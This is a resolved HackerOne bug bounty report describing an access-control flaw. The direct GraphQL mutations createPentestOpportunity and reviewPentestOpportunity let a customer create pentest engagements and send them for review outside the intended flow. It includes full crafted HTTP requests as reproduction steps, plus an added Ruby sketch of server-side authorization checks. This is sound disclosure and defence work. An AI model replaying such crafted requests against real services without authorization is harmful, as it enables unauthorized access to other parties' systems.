An attacker can submit a Pentest Opportunity and change the status of the opportunity from submitted to in_review or reviewed
Severity: Medium
Program: HackerOne
Reported by: marvelmaniac
## Vulnerability Details
## Summary
I tried my best to look for any visible feature or functionality through which I could create a pentest opportunity in my demo organization, but didn't find any. Also, looking into HackerOne pentests on the internet, I only found HTML forms to send my details, after which someone from the support team reaches out. However, through a GraphQL mutation, `createPentestOpportunity`, I was able to create pentest opportunities in my demo org (and I assume this is also true for other customers with non-demo orgs) without going through the proper flow, and as soon as it is sent for review a derived pentest is also created.
## Steps To Reproduce
1. Create a demo organization in hackerone.
2. Send this request using your cookies & csrf-token and the `organization_id`:
```http
POST /graphql HTTP/1.1
Host: hackerone.com
Cookie: <COOKIES>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://hackerone.com/bugs?subject=user&report_id=2036649&view=open&substates%5B%5D=new&substates%5B%5D=needs-more-info&substates%5B%5D=pending-program-review&substates%5B%5D=triaged&substates%5B%5D=pre-submission&substates%5B%5D=retesting&reported_to_team=&text_query=&program_states%5B%5D=2&program_states%5B%5D=3&program_states%5B%5D=4&program_states%5B%5D=5&sort_type=latest_activity&sort_direction=descending&limit=25&page=1
Content-Type: application/json
X-Csrf-Token: <CSRF-TOKEN>
X-Product-Area: other
X-Product-Feature: other
X-Datadog-Origin: rum
X-Datadog-Parent-Id: 7607766352867302438
X-Datadog-Sampling-Priority: 1
X-Datadog-Trace-Id: 5479493917599437707
Content-Length: 452
Origin: https://hackerone.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
{"query": "mutation {\r\n createPentestOpportunity(\r\n input: {\r\n company_name: \"My Company\"\r\n customer_email: \"[email protected]\"\r\n organization_id: <ORG-ID>\r\n name: \"My Pentest\"\r\n }\r\n ) {\r\n clientMutationId\r\n pentest_opportunity {\r\n id\r\n token\r\n }\r\n errors {\r\n edges{node{message}}\r\n total_count\r\n }\r\n was_successful\r\n }\r\n}\r\n"}
```
You can find the `organization_id` by searching for that field name in your Burp history. It is the value of the `_id` field:
{F2448919}
3. The pentest opportunity is successfully created. In the response you'll find the ID and the token of the opportunity.
4. Send this request to send your opportunity for review:
```http
POST /graphql HTTP/1.1
Host: hackerone.com
Cookie: <COOKIES>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://hackerone.com/opportunities/all
Content-Type: application/json
X-Csrf-Token: <CSRF-TOKEN>
X-Product-Area: other
X-Product-Feature: other
X-Datadog-Origin: rum
X-Datadog-Parent-Id: 7607766352867302438
X-Datadog-Sampling-Priority: 1
X-Datadog-Trace-Id: 5479493917599437707
Content-Length: 305
Origin: https://hackerone.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
{"query": "mutation {\r\n reviewPentestOpportunity(\r\n input: {\r\n pentest_opportunity_id: \"<ID-FROM-STEP-3>\" }) {\r\n clientMutationId\r\n errors {\r\n total_count\r\n edges{node{message}}\r\n }\r\n was_successful\r\n }\r\n}\r\n"}
```
The opportunity is successfully sent for review.
5. Now go to your browser and open your demo organization's engagements. There you will find a pentest opportunity in the "pending review" state (ignore the errors for now, since it was created purely from Burp, and only for testing; many arguments were skipped for convenience).
6. Go to the Pentests tab under Engagements; you'll also find a derived pentest there, under review (currently I'm looking at what I can do with it from my end).
{F2448944}
{F2448945}
## Impact
Users/customers can create pentest engagements without going through the proper flow and send them for review to the H1 pentest team.
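As an added example, not part of the report and not HackerOne's code, the following Ruby sketch shows the kind of server-side guard that closes this class of issue: the mutation resolvers decide who may create an opportunity and who may move it along `submitted -> in_review -> reviewed`, instead of trusting that the mutation is only reachable through the intended UI flow. It assumes two roles (`:customer` and `:pentest_staff`), an `Actor` / `PentestOpportunity` model and a `PentestOpportunityService`, all of which are hypothetical names chosen for illustration; it also records denied calls in an audit log, which is what a detection team would want to alert on.

```ruby
# Added example (not HackerOne's code): role- and state-transition checks for
# mutations shaped like createPentestOpportunity / reviewPentestOpportunity.
# Roles, statuses and class names are assumptions for illustration.

class AuthorizationError < StandardError; end
class InvalidTransitionError < StandardError; end

# Assumed roles: :customer (a member of a customer org) and :pentest_staff
# (the internal team that opens opportunities and reviews them).
Actor = Struct.new(:id, :organization_id, :role, keyword_init: true)
PentestOpportunity = Struct.new(:id, :organization_id, :name, :status, :created_by,
                                keyword_init: true)

# The lifecycle named in the report: submitted -> in_review -> reviewed.
# Each entry maps an allowed (from, to) pair to the role that may trigger it.
# A customer has no entry here, so a customer's review call is rejected no
# matter which target status it names.
ALLOWED_TRANSITIONS = {
  [:submitted, :in_review] => :pentest_staff,
  [:in_review, :reviewed]  => :pentest_staff
}.freeze

class PentestOpportunityService
  attr_reader :audit_log

  def initialize
    @opportunities = {}
    @audit_log = []   # denied attempts, kept for detection and alerting
    @next_id = 1
  end

  # createPentestOpportunity: the decision is made from the authenticated
  # actor's role, not from the organization_id argument in the request body.
  def create(actor:, organization_id:, name:)
    unless actor.role == :pentest_staff
      deny!(actor, :createPentestOpportunity, organization_id,
            "role #{actor.role} may not create pentest opportunities")
    end
    opp = PentestOpportunity.new(id: @next_id, organization_id: organization_id,
                                 name: name, status: :submitted, created_by: actor.id)
    @next_id += 1
    @opportunities[opp.id] = opp
  end

  # reviewPentestOpportunity: the target status must be a legal next step AND
  # the actor must hold the role that owns that step.
  def transition(actor:, opportunity_id:, to:)
    opp = @opportunities.fetch(opportunity_id) do
      raise InvalidTransitionError, "unknown opportunity #{opportunity_id}"
    end
    required_role = ALLOWED_TRANSITIONS[[opp.status, to]]
    if required_role.nil?
      raise InvalidTransitionError, "#{opp.status} -> #{to} is not a valid transition"
    end
    unless actor.role == required_role
      deny!(actor, :reviewPentestOpportunity, opportunity_id,
            "role #{actor.role} may not move an opportunity to #{to}")
    end
    opp.status = to
    opp
  end

  private

  # Log the denied call before raising so a SIEM can pick up probing of the
  # GraphQL endpoint by accounts that never legitimately use these mutations.
  def deny!(actor, mutation, subject, reason)
    @audit_log << { actor_id: actor.id, mutation: mutation, subject: subject, reason: reason }
    raise AuthorizationError, reason
  end
end
```

The design point is that authorization lives in the resolver, keyed on the caller's role and the opportunity's current status, so removing the button from the UI is irrelevant: a hand-crafted `reviewPentestOpportunity` from a customer account fails the role check and leaves an audit record.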
## Report Details
State: Closed
Substate: Resolved
Weakness: Improper Access Control - Generic